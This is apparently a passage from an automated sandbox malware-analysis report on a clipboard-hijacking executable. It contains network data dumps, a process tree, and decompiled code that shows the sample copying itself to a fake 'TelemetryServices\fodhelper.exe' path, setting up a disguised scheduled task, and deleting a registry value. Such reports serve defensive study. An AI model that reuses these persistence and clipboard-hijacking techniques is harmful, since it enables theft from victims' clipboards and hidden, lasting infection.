2021-10-08 15:51:51 UTC	142	IN	Data Raw: 07 a3 49 fa 1f a8 da 22 52 00 35 80 70 2c d0 45 db bc ca 5b 65 b3 f4 10 ed 8d 1d 84 03 74 5c 53 48 f8 ea bd 85 7a 14 0a 95 44 6b 87 09 a7 92 ae 68 c0 92 02 4f 0c be 8f e5 ec 01 0d ee 43 93 fb 99 35 39 8b 1f 90 20 13 4f ea 07 a9 67 28 ce e5 90 65 b3 a4 af 15 85 20 97 3c 06 2c 6a 4f 1a 70 13 f6 fd f3 71 05 ad a3 46 3e a5 2d 4f a6 d0 37 ca ab e0 e5 04 ff df 5e 4f 7e 77 8c 53 84 fc db ef a5 3a 07 56 d4 9b 32 56 d0 ce 43 63 c3 91 5d da 69 68 28 26 61 77 1c 61 db 11 e7 8d dc 5c 5f 6f d9 b7 ab 68 97 e7 22 e8 0b 9d 1b 42 e5 80 72 8d 09 98 6e 97 ea a6 53 86 e1 16 a6 ae e8 f1 fd 7d f6 0d ef 82 75 59 92 da 2d 09 48 9b ea fe a3 c7 cf 31 32 c2 ed 0d 33 93 f6 f9 17 28 e5 37 94 76 bb c0 18 04 44 bc ff ab df dd 5f a3 cd b8 86 83 8d 72 20 99 4a 88 f2 84 eb 7d f9 97 c4 91 Data Ascii: I"R5p,E[et\SHzDkhOC59 Og(e <,jOpqF>-O7^O~wS:V2VCc]ih(&awa\_oh"BrnS}uY-H123(7vD_r J}
2021-10-08 15:51:51 UTC	146	IN	Data Raw: 26 73 7b 19 53 88 c4 ac f3 4d a5 2d 4d 01 b3 1c 09 5b 20 13 ca 49 7c a2 88 56 ca f4 4d ff ab f1 8d 5d a4 50 86 0c f1 61 fc af 2d 39 15 4b f8 67 e6 6a 1c 82 01 b7 01 1c e1 b0 e6 eb 5f 66 30 3e d1 6a c4 9d bb 35 2d 61 a4 97 3a 8a 12 2c a4 7c 1b 79 97 4e c0 7b a6 de 1c 82 fa 3b 87 07 59 67 e6 6a 1c 82 01 b7 01 cc 58 99 b5 f6 ea 42 60 88 41 69 4a 53 49 78 b0 45 96 2e 34 45 14 08 58 98 5d a8 05 ba 7a 14 0b e4 02 0d ee 0b 1f 66 3e a2 c0 b7 ea 71 a4 db a8 9e c2 c8 58 66 4b fe ec 7c a5 85 d3 12 61 2f b2 b0 30 c6 5d e9 7f 9f 94 29 e9 f3 36 e6 ef ee 53 5d 2d f7 13 23 cb c2 13 26 b1 ef 80 3b 8e e4 15 b4 33 28 76 e1 22 92 9d 1e 0d 0f 38 1c 01 0d ee 52 d9 4f 69 42 0e 0b eb 2e f4 9b 79 33 9e 1e 36 ce 4a 88 f3 66 53 d5 cf c8 58 7c 77 8c e6 66 79 e1 6a b0 9b 3f 1a 8d 60 Data Ascii: &s{SM-M[ I\|VM]Pa-9Kgj_f0>j5-a:,\|yN{;YgjXB`AiJSIxE.4EX]zf>qXfK\|a/0])6S]-#&;3(v"8ROiB.y36JfSX\|wfyj?`
2021-10-08 15:51:51 UTC	150	IN	Data Raw: e8 f4 50 c7 89 f7 73 9f 68 a2 4b fa 5f 14 7f b0 4e 85 0c 0a dd 59 5b 1a da d9 24 26 57 57 17 7d 32 09 ea 5a 22 39 0b 60 ac 63 73 6e 40 44 a0 f9 98 33 c0 93 e7 41 01 17 d4 f2 ac 63 33 c0 d3 6c 7c 16 da 26 a1 c9 29 a8 1a 2e a5 56 73 70 d3 41 e2 e5 2c 09 b3 20 b7 ee 02 ca ab e1 23 ba 3f 9e f6 55 12 f1 89 8f dd 79 fd a4 a9 dc d7 4b fa 1f d0 a6 bb 6c e1 63 33 c0 93 a7 97 a8 e4 56 b4 76 e1 63 33 c0 d3 57 8f 0b e0 e0 e0 e0 e0 e0 a0 54 7b 49 f5 93 a7 d7 4b fa 5f 25 5d 75 5f 2a 2a 2a 2a 2a 6a c8 3b 93 a7 d7 4b fa 1f 90 60 a4 aa 5e a7 d7 4b fa 1f 90 60 a9 14 f5 93 a7 d7 4b fa 1f d0 b8 20 12 f1 89 8f 9d bf 11 51 f7 18 ff ab e1 63 33 c0 93 d8 32 be 8e 1b 86 08 d9 4f 03 8f c6 4c a5 0a 00 c1 fd a6 15 4d 72 73 81 a4 8d 97 5a 67 e3 67 7d 45 88 4e 2d 69 c2 9c b0 71 21 91 Data Ascii: PshK_NY[$&WW}2Z"9`csn@D3Ac3l\|&).VspA, #?UyKlc3Vvc3WT{IK_%]u_*****j;K`^K`K Qc32OLMrsZgg}EN-iq!
2021-10-08 15:51:51 UTC	154	IN	Data Raw: cb a7 12 f2 06 aa a3 f6 1d e1 e8 fc 00 91 29 a0 62 f5 1a 00 e1 27 28 69 37 c8 a7 21 91 86 4c f7 9c 19 c5 96 e8 f7 bc 8e 90 df a1 31 39 26 21 95 ac dd b0 6c 79 70 5a ba 81 f7 40 54 0f 69 42 67 18 ff 20 36 43 6d 4c 3d 5d 95 a9 dd 9f ef 47 7b 6d 0d e3 73 f9 5c 90 20 53 8b 80 e4 e9 76 a0 c0 8b 91 a3 cd 72 5e b3 55 0a a0 4a 77 25 18 eb 46 ed 80 b8 06 cc 8d 98 33 81 fa 0b 5d 0c ad 99 b5 b8 06 c0 ae 53 68 b5 f9 dd df 46 6b 7c f4 34 06 5f d4 e8 0f e2 e5 6c c8 af 03 92 ae 68 c0 92 2a c3 e5 93 51 4a 9f c0 53 8e 1f b4 32 b5 d1 b5 fd 82 ba 0e e5 a1 4a 73 7e b0 e4 29 ab c5 1b 0d 46 12 fd 5b a3 32 c1 e3 36 af e2 c1 52 00 cd 5b 23 91 86 4c f7 90 04 8b 1d 8f b9 46 e5 74 a9 de db a2 4f 27 e7 fa 1b a2 0f e0 e0 e0 e1 3f 34 9c b6 7b 2c a9 c8 8a 38 4c 3d 5e bf 3c 57 17 7d 73 Data Ascii: )b'(i7!L19&!lypZ@TiBg 6CmL=]G{ms\ Svr^UJw%F3]ShFk\|4_lh*QJS2Js~)F[26R[#LFtO'?4{,8L=^<W}s
2021-10-08 15:51:51 UTC	158	IN	Data Raw: 32 6d dc 14 ae 36 18 a2 53 c9 aa c2 ed 87 b1 ef c5 9a dc 6f 57 9e 41 69 45 60 a3 26 22 9e 81 4f 05 24 dc 52 74 23 62 97 59 4b fc af ba 83 ab e1 26 aa 5e a7 c7 24 74 d8 a7 c8 d4 c3 5f 11 68 4b fa 5a 17 69 66 ff 20 15 0e f3 aa 1a 3f dd 1c 82 f8 93 b7 da 96 a5 d4 b0 7d 56 d0 81 7a 60 ac 26 a8 5c a0 4a 37 41 e5 e7 77 ed 88 4d 74 db df 05 ba 82 77 64 f7 1d 6f f1 8d da 5b 30 1d cf 1c 1d af ae e3 64 3f cd 17 39 45 ff 8f c9 a0 b9 fd 56 94 cb af ea f8 15 87 48 f2 28 32 3d c8 83 cc 39 31 44 99 b5 18 7e 3e d1 ec 76 ed a4 3c db 50 a2 37 47 f8 3e 2e b9 26 35 4c a5 59 f3 4a f4 45 bc dc 84 c3 91 61 74 82 a1 94 31 7f f4 14 b2 fb a9 f8 5e 8c 1a 20 56 1f 97 38 44 4d bb 8c 07 22 17 71 71 29 2b aa d7 8b a7 5b 55 14 ce b5 b8 05 b5 41 e4 63 37 ee 46 e5 93 58 64 a7 3f db df 5e Data Ascii: 2m6SoWAiE`&"O$Rt#bYK&^$t_hKZif ?}Vz`&\J7AwMtwdo[0d?9EVH(2=91D~>v<P7G>.&5LYJEat1^ V8DM"qq)+[UAc7FXd?^

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: hTu8FeYy28.exe PID: 3092 Parent PID: 5944

General

Start time:	17:50:03
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\hTu8FeYy28.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\hTu8FeYy28.exe'
Imagebase:	0x400000
File size:	1195008 bytes
MD5 hash:	A003B564BD23880F99A29006E780A89B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: hTu8FeYy28.exe PID: 2336 Parent PID: 3092

General

Start time:	17:51:50
Start date:	08/10/2021
Path:	C:\Users\user\Desktop\hTu8FeYy28.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\hTu8FeYy28.exe
Imagebase:	0x400000
File size:	1195008 bytes
MD5 hash:	A003B564BD23880F99A29006E780A89B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4528 Parent PID: 3092

General

Start time:	17:51:51
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 4600 Parent PID: 2336

General

Start time:	17:51:51
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe'
Imagebase:	0x1230000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4808 Parent PID: 4528

General

Start time:	17:51:51
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3652 Parent PID: 4600

General

Start time:	17:51:52
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2824 Parent PID: 4528

General

Start time:	17:51:52
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6936 Parent PID: 2824

General

Start time:	17:51:52
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6920 Parent PID: 3092

General

Start time:	17:51:53
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: fodhelper.exe PID: 3548 Parent PID: 664

General

Start time:	17:51:53
Start date:	08/10/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Imagebase:	0x400000
File size:	1195008 bytes
MD5 hash:	A003B564BD23880F99A29006E780A89B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi

Chronological Activities

Analysis Process: conhost.exe PID: 7028 Parent PID: 6920

General

Start time:	17:51:53
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 1716 Parent PID: 6920

General

Start time:	17:51:53
Start date:	08/10/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg delete hkcu\Environment /v windir /f
Imagebase:	0xee0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4776 Parent PID: 1716

General

Start time:	17:51:54
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: hTu8FeYy28.exe PID: 2336 Parent PID: 3092 hTu8FeYy28.exeCOMMON

Executed Functions

Function 00401000, Relevance: 131.4, APIs: 37, Strings: 38, Instructions: 159
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401000() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t49;
				void* _t50;
				struct HINSTANCE__* _t52;
				void* _t54;
				struct HINSTANCE__* _t56;
				void* _t58;
				struct HINSTANCE__* _t60;
				struct HINSTANCE__* _t61;
				struct HINSTANCE__* _t62;

				_t11 = LoadLibraryW(L"kernel32.dll");
				_v8 = _t11;
				if(_t11 != 0) {
					_t12 = GetProcAddress(_t11, "LoadLibraryW");
					 *0x40400c = _t12;
					_v12 =  *_t12(L"Shlwapi.dll", _t54, _t58, _t50);
					_v20 = LoadLibraryW(L"ntdll.dll");
					_t15 = LoadLibraryW(L"Shell32.dll");
					_t16 = LoadLibraryW(L"Ole32.dll"); // executed
					_v16 = LoadLibraryW(L"User32.dll");
					LoadLibraryW(L"Ole32.dll");
					_t19 = GetProcAddress(_v8, "GetProcAddress");
					_t60 = _v8;
					 *0x404038 = _t19;
					 *0x40401c =  *_t19(_t60, "GetModuleFileNameW");
					 *0x404044 = GetProcAddress(_t60, "CreateDirectoryW");
					 *0x404024 = GetProcAddress(_t60, "GlobalAlloc");
					 *0x40403c = GetProcAddress(_t60, "GlobalFree");
					 *0x404000 = GetProcAddress(_t60, "GlobalLock");
					 *0x404034 = GetProcAddress(_t60, "GlobalUnlock");
					 *0x404010 = GetProcAddress(_t60, "LocalAlloc");
					 *0x404030 = GetProcAddress(_t60, "LocalFree");
					_t28 = GetProcAddress(_t60, "lstrlenW");
					_t61 = _v12;
					 *0x404020 = _t28;
					 *0x404018 = GetProcAddress(_t61, "StrChrW");
					 *0x404054 = GetProcAddress(_t61, "StrStrW");
					GetProcAddress(_t61, "StrStrIW");
					GetProcAddress(_t61, "StrToIntExW");
					 *0x404058 = GetProcAddress(_t61, "PathIsDirectoryW");
					GetProcAddress(_t16, "CoInitialize");
					_t56 = _v8;
					GetProcAddress(_t56, "HeapFree");
					GetProcAddress(_t56, "CreateMutexA");
					 *0x404040 = GetProcAddress(_t56, "CreateMutexW");
					 *0x40402c = GetProcAddress(_t56, "GetLastError");
					GetProcAddress(_t15, "SHGetFolderPathA");
					_t40 = GetProcAddress(_t61, "PathAppendW");
					_t62 = _v16;
					 *0x404014 = _t40;
					GetProcAddress(_t62, "StringCbPrintfW");
					_t52 = _v20;
					 *0x404028 = GetProcAddress(_t52, "memset");
					GetProcAddress(_t52, "wmemset");
					 *0x404004 = GetProcAddress(_t52, "memcpy");
					 *0x404048 = GetProcAddress(_t62, "OpenClipboard");
					 *0x40405c = GetProcAddress(_t62, "GetClipboardData");
					 *0x404008 = GetProcAddress(_t62, "EmptyClipboard");
					 *0x404050 = GetProcAddress(_t62, "SetClipboardData");
					_t49 = GetProcAddress(_t62, "CloseClipboard");
					 *0x40404c = _t49;
					return _t49;
				}
				return _t11;
			}

0x0040100b
0x00401011
0x00401016
0x0040102b
0x00401032
0x0040103e
0x0040104c
0x0040104f
0x0040105c
0x00401074
0x00401077
0x00401085
0x00401087
0x00401090
0x0040109d
0x004010ae
0x004010bf
0x004010d0
0x004010e1
0x004010f2
0x00401103
0x00401114
0x00401119
0x0040111f
0x00401128
0x00401139
0x0040114a
0x0040114f
0x0040115b
0x00401173
0x00401178
0x0040117e
0x00401187
0x00401193
0x004011ab
0x004011bc
0x004011c1
0x004011cd
0x004011d3
0x004011dc
0x004011e1
0x004011e7
0x004011fc
0x00401201
0x00401219
0x0040122a
0x0040123b
0x0040124c
0x0040125d
0x00401262
0x0040126a
0x00000000
0x0040126f
0x00401271

APIs

LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
GetProcAddress.KERNEL32(?,CreateMutexA), ref: 00401193
GetProcAddress.KERNEL32(?,CreateMutexW), ref: 0040119F
GetProcAddress.KERNEL32(?,GetLastError), ref: 004011B0
GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 004011C1
GetProcAddress.KERNEL32(?,PathAppendW), ref: 004011CD
GetProcAddress.KERNEL32(?,StringCbPrintfW), ref: 004011E1
GetProcAddress.KERNEL32(?,memset), ref: 004011F0
GetProcAddress.KERNEL32(?,wmemset), ref: 00401201
GetProcAddress.KERNEL32(?,memcpy), ref: 0040120D
GetProcAddress.KERNEL32(?,OpenClipboard), ref: 0040121E
GetProcAddress.KERNEL32(?,GetClipboardData), ref: 0040122F
GetProcAddress.KERNEL32(?,EmptyClipboard), ref: 00401240
GetProcAddress.KERNEL32(?,SetClipboardData), ref: 00401251
GetProcAddress.KERNEL32(?,CloseClipboard), ref: 00401262

Strings

GetLastError, xrefs: 004011A5
LoadLibraryW, xrefs: 00401025
CoInitialize, xrefs: 0040116D
GlobalFree, xrefs: 004010B9
lstrlenW, xrefs: 0040110E
ntdll.dll, xrefs: 00401039
LocalAlloc, xrefs: 004010EC
PathIsDirectoryW, xrefs: 00401161
memcpy, xrefs: 00401207
Ole32.dll, xrefs: 00401055, 0040106F
Shlwapi.dll, xrefs: 0040102D
PathAppendW, xrefs: 004011C7
HeapFree, xrefs: 00401181
GlobalLock, xrefs: 004010CA
StrStrW, xrefs: 00401133
Shell32.dll, xrefs: 00401047
SetClipboardData, xrefs: 00401246
SHGetFolderPathA, xrefs: 004011B6
CreateDirectoryW, xrefs: 00401097
CloseClipboard, xrefs: 00401257
kernel32.dll, xrefs: 00401006
OpenClipboard, xrefs: 00401213
User32.dll, xrefs: 00401062
GlobalUnlock, xrefs: 004010DB
GetModuleFileNameW, xrefs: 0040108A
memset, xrefs: 004011EA
LocalFree, xrefs: 004010FD
CreateMutexA, xrefs: 0040118D
StrStrIW, xrefs: 00401144
GlobalAlloc, xrefs: 004010A8
StrChrW, xrefs: 00401122
StrToIntExW, xrefs: 00401155
GetProcAddress, xrefs: 0040107D
EmptyClipboard, xrefs: 00401235
CreateMutexW, xrefs: 00401199
GetClipboardData, xrefs: 00401224
wmemset, xrefs: 004011F6
StringCbPrintfW, xrefs: 004011D6

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
API String ID: 2238633743-2663791167
Opcode ID: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
Instruction ID: 0d8912e4709423bace0949b2378a9f04a6916989bf431ebed29eca490cc37138
Opcode Fuzzy Hash: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
Instruction Fuzzy Hash: AF5179F2A51310ABC700BFB5AE0DA8A7EFCAA897477118477B305F21A1D7B856448F5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401272, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 58
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401272() {
				short _v524;
				short _v1044;
				WCHAR* _t15;
				int _t19;
				WCHAR* _t24;

				GetModuleFileNameW(0,  &_v1044, 0x104);
				_t15 =  &_v524;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t15); // executed
				if(_t15 >= 0) {
					PathAppendW( &_v524, L"\\Microsoft\\TelemetryServices");
					_t19 = PathIsDirectoryW( &_v524); // executed
					if(_t19 == 0) {
						CreateDirectoryW( &_v524, 0); // executed
					}
					PathAppendW( &_v524, L"\\fodhelper.exe");
					_t24 = StrStrW( &_v1044,  &_v524);
					_t37 = _t24;
					if(_t24 == 0) {
						CopyFileW( &_v1044,  &_v524, 0); // executed
						E00401339( &_v524, __eflags); // executed
						ExitProcess(0xffffffff);
					} else {
						return E00401339( &_v524, _t37);
					}
				}
				return _t15;
			}

0x0040128b
0x00401291
0x0040129d
0x004012a5
0x004012b3
0x004012c0
0x004012c8
0x004012d2
0x004012d2
0x004012e4
0x004012f8
0x004012fe
0x00401300
0x0040131f
0x0040132b
0x00401332
0x00401302
0x00000000
0x00401308
0x00401300
0x0040130f

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040128B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040129D
PathAppendW.SHLWAPI(?,\Microsoft\TelemetryServices), ref: 004012B3
PathIsDirectoryW.SHLWAPI(?), ref: 004012C0
CreateDirectoryW.KERNELBASE(?,00000000), ref: 004012D2
PathAppendW.SHLWAPI(?,\fodhelper.exe), ref: 004012E4
StrStrW.SHLWAPI(?,?), ref: 004012F8
CopyFileW.KERNELBASE(?,?,00000000), ref: 0040131F
ExitProcess.KERNEL32 ref: 00401332

Strings

6Nu, xrefs: 0040129D
\fodhelper.exe, xrefs: 004012D8
\Microsoft\TelemetryServices, xrefs: 004012A7

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
String ID: 6Nu$\Microsoft\TelemetryServices$\fodhelper.exe
API String ID: 3994694214-3558657006
Opcode ID: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
Instruction ID: e9cc1551c9dc342d01193394a0d7173058b5a03e9f69f18b49f700f051a2f683
Opcode Fuzzy Hash: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
Instruction Fuzzy Hash: DC111FB1500229ABDB20DFA1DD4CECB7B7CAB45305F0005B1B769F20A1EA7497C48F68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 73.7, APIs: 4, Strings: 38, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085

Strings

CreateMutexA, xrefs: 0040118D
Ole32.dll, xrefs: 00401055, 0040106F
HeapFree, xrefs: 00401181
LocalAlloc, xrefs: 004010EC
ntdll.dll, xrefs: 00401039
LoadLibraryW, xrefs: 00401025
memcpy, xrefs: 00401207
GlobalUnlock, xrefs: 004010DB
User32.dll, xrefs: 00401062
SHGetFolderPathA, xrefs: 004011B6
Shlwapi.dll, xrefs: 0040102D
kernel32.dll, xrefs: 00401006
GlobalLock, xrefs: 004010CA
StringCbPrintfW, xrefs: 004011D6
GetProcAddress, xrefs: 0040107D
CreateDirectoryW, xrefs: 00401097
lstrlenW, xrefs: 0040110E
CloseClipboard, xrefs: 00401257
OpenClipboard, xrefs: 00401213
GetClipboardData, xrefs: 00401224
PathAppendW, xrefs: 004011C7
CoInitialize, xrefs: 0040116D
GlobalFree, xrefs: 004010B9
PathIsDirectoryW, xrefs: 00401161
StrChrW, xrefs: 00401122
StrToIntExW, xrefs: 00401155
GetModuleFileNameW, xrefs: 0040108A
CreateMutexW, xrefs: 00401199
GetLastError, xrefs: 004011A5
LocalFree, xrefs: 004010FD
StrStrIW, xrefs: 00401144
memset, xrefs: 004011EA
wmemset, xrefs: 004011F6
Shell32.dll, xrefs: 00401047
StrStrW, xrefs: 00401133
GlobalAlloc, xrefs: 004010A8
EmptyClipboard, xrefs: 00401235
SetClipboardData, xrefs: 00401246

Memory Dump Source

Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
API String ID: 2574300362-2663791167
Opcode ID: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
Instruction ID: 0d8912e4709423bace0949b2378a9f04a6916989bf431ebed29eca490cc37138
Opcode Fuzzy Hash: cb6c014d7e83f726a4f9952ea36cf0c45aa23e724227ae9a220ad06ac8f98dc9
Instruction Fuzzy Hash: AF5179F2A51310ABC700BFB5AE0DA8A7EFCAA897477118477B305F21A1D7B856448F5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040202B, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 119
stringmemorysleepCOMMON

Download Yara Rule

